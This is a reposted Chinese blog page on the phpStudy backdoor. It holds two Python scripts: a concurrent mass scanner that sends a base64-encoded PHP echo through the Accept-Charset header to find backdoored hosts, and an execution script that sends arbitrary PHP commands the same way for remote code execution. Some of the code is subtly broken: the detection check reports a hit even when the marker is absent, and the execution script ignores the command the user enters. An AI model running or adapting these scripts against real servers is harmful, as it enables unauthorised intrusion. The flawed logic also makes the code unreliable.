碼上快樂

相關內容    簡體    繁體

phpstudy漏洞檢測

本文轉載自   查看原文   2019-10-14 00:34   391    phpstudy漏洞

后門檢測腳本

# !/usr/bin/env python # -*- coding:utf-8 -*- import gevent from gevent import monkey gevent.monkey.patch_all() import requests as rq def file_read(file_name="url.txt"): with open(file_name, "r") as f: return [i.replace("\n", "") for i in f.readlines()] def check(url): ''' if "http://" or "https://" not in url: url = "https://" + url ''' headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Sec-Fetch-Site': 'none', 'accept-charset': 'ZWNobyBlZVN6eHU5Mm5JREFiOw==', # 輸出 eeSzxu92nIDAb 'Accept-Encoding': 'gzip,deflate', 'Accept-Language': 'zh-CN,zh;q=0.9', } try: res = rq.get(url, headers=headers, timeout=20) if res.status_code == 200: if res.text.find('eeSzxu92nIDAb'): print("[存在漏洞] " + url) except: print("[超時] " + url) if __name__ == '__main__': print("phpStudy 批量檢測 (需要 gevent,requests 庫)") print("使用之前,請將URL保存為 url.txt 放置此程序同目錄下") input("任意按鍵開始執行..") tasks = [gevent.spawn(check, url) for url in file_read()] print("正在執行...請等候") gevent.joinall(tasks) wait = input("執行完畢 任意鍵退出...")

后門執行腳本

# !/usr/bin/env python # -*- coding:utf-8 -*- import requests import base64 def backdoor(url, command="system('calc.exe');"): headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Sec-Fetch-Site': 'none', 'accept-charset': 'c3lzdGVtKCdjYWxjLmV4ZScpOw==', 'Accept-Encoding': 'gzip,deflate', 'Accept-Language': 'zh-CN,zh;q=0.9', } command = base64.b64encode(command.encode('utf-8')) command = str(command, 'utf-8') result = requests.get(url, headers=headers, verify=False) if result.status_code == "200": print("執行完成") a = input("任意鍵退出...") url = input("輸入URL(例如:http://127.0.0.1:228/xx.php)\n") command = input("輸入命令 默認為 system('calc.exe'); (不想輸入直接回車)\n") backdoor(url, command)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 PhpStudy2018后門漏洞預警及漏洞復現&檢測和執行POC腳本 phpStudy nginx 解析漏洞 phpstudy后門漏洞復現 phpStudy后門漏洞利用復現 PHPstudy Nginx解析漏洞復現 phpStudy后門漏洞利用復現 phpStudy后門漏洞利用復現 Phpstudy(小皮面板) nginx 解析漏洞 phpstudy后門漏洞復現php5.2 如何檢測php代碼漏洞
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM